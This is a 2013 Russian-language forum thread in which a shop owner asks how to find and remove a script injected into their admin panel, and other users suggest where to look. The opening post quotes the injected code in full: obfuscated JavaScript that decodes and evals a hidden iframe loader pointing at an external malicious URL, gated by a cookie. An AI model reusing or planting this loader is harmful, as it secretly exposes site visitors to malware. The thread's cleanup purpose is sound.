wsite 0 Опубликовано 16 июля, 2013 Жалоба Share Опубликовано 16 июля, 2013 Появился непонятный скрипт в админке съехало меню, нет доступа к некоторым пунктам При просмотре кода страницы админки из браузера видно код скрипта такой: <script type="text/javascript" language="javascript" > d="doc"+"ument";try{++document.body}catch(q){aa=function(ff){for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-12);}};};ps="split";e=(eval);v="0x";a=0;z="y";try{;}catch(zz){a=1}if(!a){try{++e(d)["bod"+z]}catch(q){a2="_";}z="2c_72_81_7a_6f_80_75_7b_7a_2c_86_86_86_72_72_72_34_35_2c_87_19_16_2c_82_6d_7e_2c_77_73_6d_78_6e_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7e_71_6d_80_71_51_78_71_79_71_7a_80_34_33_75_72_7e_6d_79_71_33_35_47_19_16_19_16_2c_77_73_6d_78_6e_3a_7f_7e_6f_2c_49_2c_33_74_80_80_7c_46_3b_3b_6f_79_7c_72_75_78_79_80_82_3a_6f_7b_79_3a_6d_81_3b_83_7c_39_6f_7b_7a_80_71_7a_80_3b_7c_78_81_73_75_7a_7f_3b_83_7c_6b_6d_70_70_3b_4d_4e_44_59_6d_42_77_60_3a_7c_74_7c_33_47_19_16_2c_77_73_6d_78_6e_3a_7f_80_85_78_71_3a_7c_7b_7f_75_80_75_7b_7a_2c_49_2c_33_6d_6e_7f_7b_78_81_80_71_33_47_19_16_2c_77_73_6d_78_6e_3a_7f_80_85_78_71_3a_6e_7b_7e_70_71_7e_2c_49_2c_33_3c_33_47_19_16_2c_77_73_6d_78_6e_3a_7f_80_85_78_71_3a_74_71_75_73_74_80_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_77_73_6d_78_6e_3a_7f_80_85_78_71_3a_83_75_70_80_74_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_77_73_6d_78_6e_3a_7f_80_85_78_71_3a_78_71_72_80_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_77_73_6d_78_6e_3a_7f_80_85_78_71_3a_80_7b_7c_2c_49_2c_33_3d_7c_84_33_47_19_16_19_16_2c_75_72_2c_34_2d_70_7b_6f_81_79_71_7a_80_3a_73_71_80_51_78_71_79_71_7a_80_4e_85_55_70_34_33_77_73_6d_78_6e_33_35_35_2c_87_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_83_7e_75_80_71_34_33_48_70_75_82_2c_75_70_49_68_33_77_73_6d_78_6e_68_33_4a_48_3b_70_75_82_4a_33_35_47_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_73_71_80_51_78_71_79_71_7a_80_4e_85_55_70_34_33_77_73_6d_78_6e_33_35_3a_6d_7c_7c_71_7a_70_4f_74_75_78_70_34_77_73_6d_78_6e_35_47_19_16_2c_89_19_16_89_19_16_72_81_7a_6f_80_75_7b_7a_2c_5f_71_80_4f_7b_7b_77_75_71_34_6f_7b_7b_77_75_71_5a_6d_79_71_38_6f_7b_7b_77_75_71_62_6d_78_81_71_38_7a_50_6d_85_7f_38_7c_6d_80_74_35_2c_87_19_16_2c_82_6d_7e_2c_80_7b_70_6d_85_2c_49_2c_7a_71_83_2c_50_6d_80_71_34_35_47_19_16_2c_82_6d_7e_2c_71_84_7c_75_7e_71_2c_49_2c_7a_71_83_2c_50_6d_80_71_34_35_47_19_16_2c_75_72_2c_34_7a_50_6d_85_7f_49_49_7a_81_78_78_2c_88_88_2c_7a_50_6d_85_7f_49_49_3c_35_2c_7a_50_6d_85_7f_49_3d_47_19_16_2c_71_84_7c_75_7e_71_3a_7f_71_80_60_75_79_71_34_80_7b_70_6d_85_3a_73_71_80_60_75_79_71_34_35_2c_37_2c_3f_42_3c_3c_3c_3c_3c_36_3e_40_36_7a_50_6d_85_7f_35_47_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_2c_49_2c_6f_7b_7b_77_75_71_5a_6d_79_71_37_2e_49_2e_37_71_7f_6f_6d_7c_71_34_6f_7b_7b_77_75_71_62_6d_78_81_71_35_19_16_2c_37_2c_2e_47_71_84_7c_75_7e_71_7f_49_2e_2c_37_2c_71_84_7c_75_7e_71_3a_80_7b_53_59_60_5f_80_7e_75_7a_73_34_35_2c_37_2c_34_34_7c_6d_80_74_35_2c_4b_2c_2e_47_2c_7c_6d_80_74_49_2e_2c_37_2c_7c_6d_80_74_2c_46_2c_2e_2e_35_47_19_16_89_19_16_72_81_7a_6f_80_75_7b_7a_2c_53_71_80_4f_7b_7b_77_75_71_34_2c_7a_6d_79_71_2c_35_2c_87_19_16_2c_82_6d_7e_2c_7f_80_6d_7e_80_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_75_7a_70_71_84_5b_72_34_2c_7a_6d_79_71_2c_37_2c_2e_49_2e_2c_35_47_19_16_2c_82_6d_7e_2c_78_71_7a_2c_49_2c_7f_80_6d_7e_80_2c_37_2c_7a_6d_79_71_3a_78_71_7a_73_80_74_2c_37_2c_3d_47_19_16_2c_75_72_2c_34_2c_34_2c_2d_7f_80_6d_7e_80_2c_35_2c_32_32_19_16_2c_34_2c_7a_6d_79_71_2c_2d_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_7f_81_6e_7f_80_7e_75_7a_73_34_2c_3c_38_2c_7a_6d_79_71_3a_78_71_7a_73_80_74_2c_35_2c_35_2c_35_19_16_2c_87_19_16_2c_7e_71_80_81_7e_7a_2c_7a_81_78_78_47_19_16_2c_89_19_16_2c_75_72_2c_34_2c_7f_80_6d_7e_80_2c_49_49_2c_39_3d_2c_35_2c_7e_71_80_81_7e_7a_2c_7a_81_78_78_47_19_16_2c_82_6d_7e_2c_71_7a_70_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_75_7a_70_71_84_5b_72_34_2c_2e_47_2e_38_2c_78_71_7a_2c_35_47_19_16_2c_75_72_2c_34_2c_71_7a_70_2c_49_49_2c_39_3d_2c_35_2c_71_7a_70_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_78_71_7a_73_80_74_47_19_16_2c_7e_71_80_81_7e_7a_2c_81_7a_71_7f_6f_6d_7c_71_34_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_7f_81_6e_7f_80_7e_75_7a_73_34_2c_78_71_7a_38_2c_71_7a_70_2c_35_2c_35_47_19_16_89_19_16_75_72_2c_34_7a_6d_82_75_73_6d_80_7b_7e_3a_6f_7b_7b_77_75_71_51_7a_6d_6e_78_71_70_35_19_16_87_19_16_75_72_34_53_71_80_4f_7b_7b_77_75_71_34_33_82_75_7f_75_80_71_70_6b_81_7d_33_35_49_49_41_41_35_87_89_71_78_7f_71_87_5f_71_80_4f_7b_7b_77_75_71_34_33_82_75_7f_75_80_71_70_6b_81_7d_33_38_2c_33_41_41_33_38_2c_33_3d_33_38_2c_33_3b_33_35_47_19_16_19_16_86_86_86_72_72_72_34_35_47_19_16_89_19_16_89_19_16"[ps](a2);za="";aa("fromCharCode");zaz=za;e(zaz);}</script> где его найти и удалить? искал в admin/includes/header.php - нету или что делать? Спасибо. Ссылка на сообщение Поделиться на другие сайты
eugenem 11 Опубликовано 17 июля, 2013 Жалоба Share Опубликовано 17 июля, 2013 Посмотрите по фтп даты файлов. Будет видно какие менялись в последние время. Именно они и будут заражены. Ссылка на сообщение Поделиться на другие сайты
YuraS 4 Опубликовано 17 июля, 2013 Жалоба Share Опубликовано 17 июля, 2013 даты изменения файлов легко меняются залитым шеллом. проверьте сайт тут - http://www.revisium.com/ai/ или скачайте все пхп-файлы движка и ищите в коде подозрительные вставки. Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 17 июля, 2013 Жалоба Share Опубликовано 17 июля, 2013 Посмотрите js файлы, например /admin/includes/general.js Видимо, там. Ссылка на сообщение Поделиться на другие сайты
wsite 0 Опубликовано 18 июля, 2013 Автор Жалоба Share Опубликовано 18 июля, 2013 Спасибо всем. Скачал все файлы, искал с notepad++ по фрагментам кода всех файлов - ничего не находит. еще в htaccess был посторонний код, как писал ув. Yurassik1 в другой ветке "возможно, сервер дыряв, как дуршлаг. хостинг копеечный?" - возможно.... по поиску в инете волна пошла сранья в htaccess по датам изменения на хостинге тоже ничего не нашел. по каким фрагментам кода искать поиском? ai-bolit - не понял как запустить на сайте ai-bolit.php с помощью putty? или как?, я не сильно хакер(( "Посмотрите js файлы, например /admin/includes/general.js" тут нет Пока отключил выпадающее меню в админке, стало простое меню слева вертикально, код из html кода исчез. Что это значит? в каком он файле или js? ai-bolit - не понял как запустить на сайте ai-bolit.php с помощью putty? или как?, я не сильно хакер(( Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 19 июля, 2013 Жалоба Share Опубликовано 19 июля, 2013 Выпадающее меню в /admin/includes/column_left.php Посмотрите ещё файл /admin/includes/general.js А так же /admin/includes/javascript/categoires.js Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения